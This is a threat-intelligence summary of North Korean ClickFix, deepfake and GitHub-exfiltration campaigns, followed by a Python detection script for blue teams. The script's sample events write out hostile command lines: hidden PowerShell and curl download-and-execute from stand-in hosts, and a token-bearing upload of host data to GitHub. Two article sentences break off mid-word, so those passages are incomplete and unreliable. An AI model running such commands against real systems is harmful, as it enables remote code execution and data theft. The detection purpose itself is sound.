Threat actors linked to North Korea are upgrading their tradecraft, pairing ClickFix-style error prompts with AI-generated deepfake identities to move beyond espionage into financial crime and disruptive operations, researchers say.
A new GitLab Threat Intelligence investigation details campaigns that use fake error pop-ups—prompting victims to run system commands—to deliver BeaverTail (a JavaScript stealer) and its companion InvisibleFerret (a Python backdoor). Unlike earlier developer-focused runs, this wave hit marketing and crypto-trading roles via sham recruitment portals hosted on Vercel. A staged “video assessment” ended in a bogus technical error, triggering malware execution. The latest BeaverTail is leaner, compiled for Windows, macOS, and Linux, and narrows browser-extension targeting to eight (mostly Chrome), boosting stealth.
Building on the Contagious Interview / Gwisin Gang operations (late-2022 onward), researchers cite ~230 victims (Jan–Mar 2025), including applicants to Robinhood, eToro, and Archblock. The “ClickFake Interview” phase adds GolangGhost, PylangGhost, and FlexibleFerre
Separately, ScarCruft (APT37) has shifted toward financial motives, debuting CHILLYCHINO, a Rust-based Windows implant (June 2025), paired with FadeStealer for keylogging, screenshots, and audio capture; delivery uses spear-phishing ZIP/LNK/CHM lur
Kimsuky (APT43) has been tied to two mid-2025 tracks: (1) GitHub abuse, in which PowerShell scripts use stolen private tokens to exfiltrate host telemetry to attacker-controlled repos, delivered alongside decoy documents; (2) deepfake military IDs in defense-themed spear-phishing targeting officials, researchers, activists, and journalists. ClickFix-style CAPTCHA gates deploy AutoIt scripts or lead to credential-harvest portals.
Bottom line: DPRK operators are diversifying targets, modernizing tooling (JS, Rust, Python), weaponizing AI, and rotating infrastructure quickly. Crypto, defense, and retail orgs should harden controls against ClickFix lures, recruitment-themed decoys, and unusual GitHub traffic.
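As an added illustration of the two detection opportunities the article closes on (ClickFix lures that make a user paste a command, and PowerShell talking to the GitHub API with a token), here is a small scoring detector run over constructed process-creation events. This is example code written for this page, not code from GitLab Threat Intelligence or from any of the reports it cites; the event schema (Sysmon-style JSON lines with `host`, `user`, `parent_image`, `image`, `cmdline`), the `*.example.invalid` hostnames, the org/repo names and the token value are all assumptions made up for the example.

```python
"""Added detection sketch (not from the GitLab report or the article): score
process-creation events for ClickFix-style 'paste this command' execution and
for scripted GitHub API traffic that carries a token.

Assumptions: each event is one JSON line with the fields host, user,
parent_image, image and cmdline. All sample events, hostnames
(*.example.invalid), repo names and token values below are constructed."""
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Parents that mean a human launched the command: the Run dialog (explorer.exe),
# a browser, or a terminal. A shell under one of these is only a weak signal.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "terminal", "windowsterminal.exe"}
# Interpreters ClickFix lures ask the victim to open on Windows, macOS or Linux.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
          "cscript.exe", "bash", "zsh", "sh"}

# Command-line indicators; each hit adds one point to the event's score.
PATTERNS = {
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|curl|wget|downloadstring)\b", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(
        r"(-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string)", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s*hidden", re.I),
    "github_api": re.compile(r"(api\.github\.com|raw\.githubusercontent\.com)", re.I),
    "github_token": re.compile(
        r"(authorization\s*[:=]\s*['\"]?(token|bearer)\s+\S+|\bghp_[A-Za-z0-9]{20,})", re.I),
}


@dataclass
class Alert:
    host: str
    user: str
    image: str
    verdict: str
    reasons: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> Optional[Alert]:
    """Return an Alert when at least two independent indicators line up."""
    parent, image = basename(ev.get("parent_image", "")), basename(ev.get("image", ""))
    cmd = ev.get("cmdline", "")
    reasons = []
    if image in SHELLS and parent in INTERACTIVE_PARENTS:
        reasons.append(f"shell spawned from interactive parent {parent}")
    reasons += [name for name, pat in PATTERNS.items() if pat.search(cmd)]
    names = set(reasons)
    if {"github_api", "github_token"} <= names:
        verdict = "github-exfil"          # API host plus a token in the command line
    elif len(reasons) >= 2:
        verdict = "clickfix-suspect"      # e.g. shell from Run dialog + download cradle
    else:
        return None                       # a single weak indicator is normal admin/dev work
    return Alert(ev["host"], ev["user"], image, verdict, reasons)


def scan(lines) -> List[Alert]:
    """Run score_event over JSON lines, skipping malformed telemetry."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = score_event(ev)
        if alert:
            alerts.append(alert)
    return alerts


def _ev(host, user, parent, image, cmd):
    return json.dumps({"host": host, "user": user, "parent_image": parent,
                       "image": image, "cmdline": cmd})


# Constructed sample telemetry: two ClickFix-style pastes, one token-bearing
# GitHub upload, and two benign events that must stay below the threshold.
SAMPLE_EVENTS = [
    _ev("ws-17", "jdoe", r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell -w hidden -c "iwr https://verify.example.invalid/fix | iex"'),
    _ev("ws-03", "SYSTEM", r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    _ev("ws-22", "asmith", r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -nop -c \"Invoke-RestMethod -Uri https://api.github.com/repos/"
        "example-org/telemetry/contents/host.txt -Method PUT "
        "-Headers @{Authorization='token ghp_PLACEHOLDER000000000000000000'}\""),
    _ev("ws-09", "dev1", r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
        r"C:\Program Files\PowerShell\7\pwsh.exe", 'pwsh -c "git pull"'),
    _ev("mb-05", "kchen", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
        "/bin/bash", "bash -c 'curl -fsSL https://assessment.example.invalid/fix.sh | bash'"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.host}/{a.user}: {a.verdict} (score {a.score}) {a.reasons}")
```

The threshold of two indicators is the design point: a shell under explorer.exe or a lone `curl` is everyday developer activity, but a shell launched from the Run dialog or a browser that immediately downloads and evaluates remote content is the shape of the ClickFix lure described above, and a command line naming the GitHub API together with a token is the shape of the Kimsuky upload. Tune `INTERACTIVE_PARENTS` and `SHELLS` to the fleet's actual process names before relying on it.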